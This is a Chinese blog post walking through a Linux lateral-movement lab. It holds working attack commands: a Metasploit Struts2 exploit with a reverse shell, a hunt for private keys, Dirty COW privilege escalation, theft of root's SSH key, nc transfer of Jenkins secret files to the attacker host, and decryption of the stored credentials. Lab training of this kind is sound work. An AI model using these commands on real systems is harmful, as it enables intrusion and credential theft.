第137天:横向移动-Linux_ssh工具杂项Linux靶场环境搭建

news2024/11/13 10:31:44

实验环境及图解:

通过网盘分享的文件:137-Linux内网环境镜像文件
链接: https://pan.baidu.com/s/1W_5DvhbkGYMqML4mi1rjQA?pwd=ad6r 提取码: ad6r

一般情况下SSH密钥存放在~/.ssh/目录下,也可以文件中搜索已保存的SSH凭证

~/.ssh/config
~/.ssh/known_hosts
~/.bash_history 

文件中搜索已经保存的ssh

grep -ir "BEGIN RSA PRIVATE KEY" /*
grep -ir "BEGIN DSA PRIVATE KEY" /*
grep -ir "BEGIN OPENSSH PRIVATE KEY" /*

nmap信息收集ip以及开放端口

别的两台主机做了限制,没办法访问

80端口页面

8080端口页面

80页面中有版本,opencms 10.5.3只有一个xxe漏洞

下面还有一个页面有漏洞/struts2-showcase/show-action,但是我也不知道这是怎么来的目录扫描也扫不到(没这个字典)

msf利用strust工具

use exploit/multi/http/struts2_content_type_ognl
set payload linux/x64/meterpreter/reverse_tcp
set rhosts 172.16.250.10
set lhost 172.16.250.128
set rport 80
run

查看目前获得的权限

上传les.sh文件GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

加执行权限,执行

扫描出来脏牛漏洞

这里利用dirty漏洞进行提权,这篇文章复现过一次

第103天: 权限提升-Linux 系统&辅助项目&脏牛&Dirty&内核漏洞&SUID&GUID_103-linux提升-内核&suid&辅助&环境&exp等-CSDN博客

下载这个c文件到本地

编译,并且加权限执行

gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread  #编译
python3 -c "import pty;pty.spawn('/bin/bash')"  #开启python子bash,脏牛漏洞得利用该bash去反弹shell
chmod +x ./dirtycow-mem
./dirtycow-mem

这个执行完成后要保证系统稳定,需要执行下面的两条命令,速度要快,不然系统会崩溃,所以就是该漏洞要谨慎去使用

echo 0 > /proc/sys/vm/dirty_writeback_centisecs
echo 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn

确保稳定性

查看数据库配置文件,发现这里是站库分离

cat /opt/tomcat/webapps/kittens/WEB-INF/config/opencms.properties

查看历史,发现利用了这个rsa去连接过30的root用户,所以要把这个文件保存在本地root目录下

 把id_rsa复制到本地,利用

cp /root/.ssh/id_rsa /tmp/id_rsa
chmod 777 id_rsa                               #需要赋予权限才可以下载
download  /tmp/id_rsa /root/id_rsa
chmod 777 id_rsa                            #恢复原来的权限,否则需要输入root密码
ssh -i id_rsa root@172.16.250.30

 复制到本地

这里这个文件需要复制到本地root用户目录下去执行,因为我本来登录的时候是kali,所以只能复制到tmp下然后移动到/root目录下

 信息收集

查看端口

正常访问是访问不了的,通过第一张图片了解到8080端口需要通过10主机去访问,设置sockets代理去访问

首先需要添加路由

设置代理

use auxiliary/server/socks_proxy
set version 5
run

这里有个扩充知识点


注意这里:
dynamic_chain:下方代理节点有一条测试正确也可以使用
strict_chain:如果下方设置了多个节点,必须都测试正确才可以使用

先测试能够访问

浏览器要访问的话需要设置代理

tomcat9.0.7版本相对安全

 

/jenkins页面

里面有一个凭据页面

利用nc把jenkins的相关密码文件传送过来,因为这里是30只让10访问,所以只能反向传输

kali
nc -lvp 1234 > master.key
nc -lvp 1234 > hudson.util.Secret
nc -lvp 1234 > credentials.xml
30主机
nc 172.16.250.128 1234 < /home/jenkins/secrets/master.key
nc 172.16.250.128 1234 < /home/jenkins/secrets/hudson.util.Secret
nc 172.16.250.128 1234 < /home/jenkins/credentials.xml

其他两个文件也是同样的方式传输

利用python脚本破解,这里python不能使用太高的版本

GitHub - cheetz/jenkins-decrypt: Credentials dumper for Jenkins

python decrypt.py master.key hudson.util.Secret credentials.xml

密码为: )uDvra{4UL^;r?*h

连接

这里其实我还是不太理解不是别的IP不让访问ssh嘛,为啥可以直接连接

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2080661.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

eclipse下载安装与配置代码补全与中文版

eclipse下载安装与配置中文版 eclipse下载eclipse安装eclipse配置代码补全eclipse配置中文版 eclipse下载 首先我们从官网下载eclipse&#xff0c;点击后是如下页面 我们往下滑&#xff0c;选择自己需要的版本&#xff0c;在这里我们选择的是Windows的Java开发版本&#xff0c…

【自动驾驶】决策规划算法 | 数学基础(二)凸优化与非凸优化

写在前面&#xff1a; &#x1f31f; 欢迎光临 清流君 的博客小天地&#xff0c;这里是我分享技术与心得的温馨角落。&#x1f4dd; 个人主页&#xff1a;清流君_CSDN博客&#xff0c;期待与您一同探索 移动机器人 领域的无限可能。 &#x1f50d; 本文系 清流君 原创之作&…

机器学习||笔记

在学习机器学习之前&#xff0c;应具备以下基础&#xff1a; 编程技能&#xff1a;精通 Python&#xff0c;掌握数据结构、函数、面向对象编程&#xff0c;熟悉 Git 和 Jupyter Notebook。 数学基础&#xff1a; 线性代数&#xff1a;矩阵运算、特征值与特征向量。微积分&…

2009年

一、选择 B C D B A 答案 C 叶子节点可能出现在最下层和次下层 所以最多七层&#xff0c;前六层是满二叉树 C 答案 B A D A B 二、大题

JVM垃圾回收算法以及垃圾收集器

JVM垃圾回收算法 JVM垃圾回收算法分为三类&#xff1a;标记清除算法、标记整理算法、 复制算法 标记清除算法 垃圾回收分为2个阶段,分别是标记和清除,效率高有磁盘碎片,内存不连续 标记整理算法 标记清除算法一样,将存活对象都向内存另一端移动,然后清理边界以外的垃圾,无…

Windows 11系统 Eclipse 2024版本安装教程和环境搭建

文章目录 目录 文章目录 安装流程 小结 概要安装流程技术细节小结 概要 Eclipse 是一个开源的集成开发环境 (IDE)&#xff0c;主要用于 Java 开发&#xff0c;但也支持其他编程语言如 C、Python 和 PHP。它提供了丰富的工具和插件&#xff0c;用于编写、调试和管理代码&#x…

【时时三省】(C语言基础)指针进阶4

山不在高&#xff0c;有仙则名。水不在深&#xff0c;有龙则灵。 ----CSDN 时时三省 阅读两段有趣的代码: 代码1: (*(void(*)())0)(); 意思是调用0地址处的函数 该函数无参&#xff0c;返回类型是void 1.void(*)()&#xff0d;函数指针 2.(void(*)())0&#xff0d;对0进…

Python编码系列—Python中的安全密码存储与验证:实战指南

&#x1f31f;&#x1f31f; 欢迎来到我的技术小筑&#xff0c;一个专为技术探索者打造的交流空间。在这里&#xff0c;我们不仅分享代码的智慧&#xff0c;还探讨技术的深度与广度。无论您是资深开发者还是技术新手&#xff0c;这里都有一片属于您的天空。让我们在知识的海洋中…

基于SSM+JSP的手机商城系统网站

系统背景 系统管理也都将通过计算机进行整体智能化操作&#xff0c;对于网上手机商城所牵扯的管理及数据保存都是非常多的&#xff0c;例如管理员&#xff1b;主页、个人中心、用户管理、商品分类管理、商品信息管理、系统管理、订单管理&#xff0c;用户&#xff1b;主页、个人…

快速了解Git服务器端基础及基本操作命令(一)

&#x1f600;前言 本篇博文是关于Git服务器端的一些基础使用及基本操作命令&#xff0c;希望你能够喜欢 &#x1f3e0;个人主页&#xff1a;晨犀主页 &#x1f9d1;个人简介&#xff1a;大家好&#xff0c;我是晨犀&#xff0c;希望我的文章可以帮助到大家&#xff0c;您的满意…

力扣面试150 插入区间 模拟

Problem: 57. 插入区间 &#x1f468;‍&#x1f3eb; 代码随想录 模拟 ⏰ 时间复杂度&#xff1a; O ( n ) O(n) O(n) class Solution {public int[][] insert(int[][] intervals, int[] newInterval) {int idx 0;List<int[]> res new ArrayList<>();while (…

如何用Hive进行高校考试分析:大数据技术提升教育质量

✍✍计算机毕业编程指导师 ⭐⭐个人介绍&#xff1a;自己非常喜欢研究技术问题&#xff01;专业做Java、Python、微信小程序、安卓、大数据、爬虫、Golang、大屏等实战项目。 ⛽⛽实战项目&#xff1a;有源码或者技术上的问题欢迎在评论区一起讨论交流&#xff01; ⚡⚡ Java、…

论文的AI含量检测靠谱吗

近年来&#xff0c;随着AI技术的飞速发展&#xff0c;越来越多的人开始关注AI在写作领域的应用&#xff0c;尤其是在学术论文中的应用。然而&#xff0c;这也催生了一些新的服务&#xff0c;如“AI含量检测”&#xff0c;声称能够检测论文中是否存在AI生成的内容。这些服务往往…

理想自动驾驶技术:探索双系统架构,自动驾驶锁定第一梯队

1、 无图 NOA 全量推送&#xff0c;向 One Model 进发 理想全国无图 NOA 全量推送实现快速追赶。理想 2021 年开始自研自动驾驶&#xff0c;并于2021 年 12 月落地高速 NOA 功能&#xff0c;进展处于国内领先水平&#xff0c;而蔚来、小鹏分别在 2020年 10 月、2021 年 1 月落…

【架构设计】安全架构设计

安全架构概述 在当今以计算机、网络和软件为载体的数字化服务几乎成为人类社会赖以生存的手段&#xff0c;与之而来的计算机犯罪呈现指数上升趋势&#xff0c;因此&#xff0c;信息的可用性、完整性、机密性、可控性和不可抵赖性等安全保障有位重要&#xff0c;为满足这些诉求&…

【Python 千题 —— 基础篇】简易图书管理系统

Python 千题持续更新中 …… 脑图地址 👉:⭐https://twilight-fanyi.gitee.io/mind-map/Python千题.html⭐ 题目描述 题目描述 编写一个面向对象的程序,模拟一个图书管理系统。要求定义一个 Book 类,具有基本的书籍信息功能;然后,创建一个 Library 类,用于管理多个 B…

银河麒麟编译libjpeg库并配置qt环境

1、系统版本:银河麒麟V10 2、libjpeg库下载:http://www.ijg.org/ 其中:files里面是既往的版本 3、 1)解压:jpegsrc.v9f.tar.gz 2)cd jpeg-9f 3) 编译参数解释: ./configure -h # 查看编译参数 --enable-shared # 编译动态库 --enable-static # 编译静态库 --w…

探索社区O2O系统源码开发:构建智慧生活的桥梁

随着互联网的飞速发展&#xff0c;特别是移动互联网的普及&#xff0c;线上线下融合&#xff08;O2O&#xff0c;Online to Offline&#xff09;模式已成为推动各行各业转型升级的重要力量。在社区服务领域&#xff0c;社区O2O系统的开发更是为居民生活带来了前所未有的便利与智…

Parallels Desktop 19发布,无需重启即可在 Mac 上运行 Windows

​ Parallels最新版本旨在优化最新 Apple 硬件的可用性&#xff0c;同时还支持性能和游戏更新&#xff0c;为用户提供更大的自由度和灵活性。 其可在 Mac 上运行超过 200000 个 Windows 应用程序&#xff0c;包括 Microsoft Office for Windows。在 Intel 或 Apple M 系列 Mac…

浅谈Kafka(二)

浅谈Kafka&#xff08;二&#xff09; 文章目录 浅谈Kafka&#xff08;二&#xff09;Kafka架构图Kafka生产者幂等性与事务生产者分区写入策略乱序问题消费者组的Reblance机制消费者分区分配策略副本机制分区的leader与followerAR/ISR/OSRcontroller介绍与选举Leader负载均衡Ka…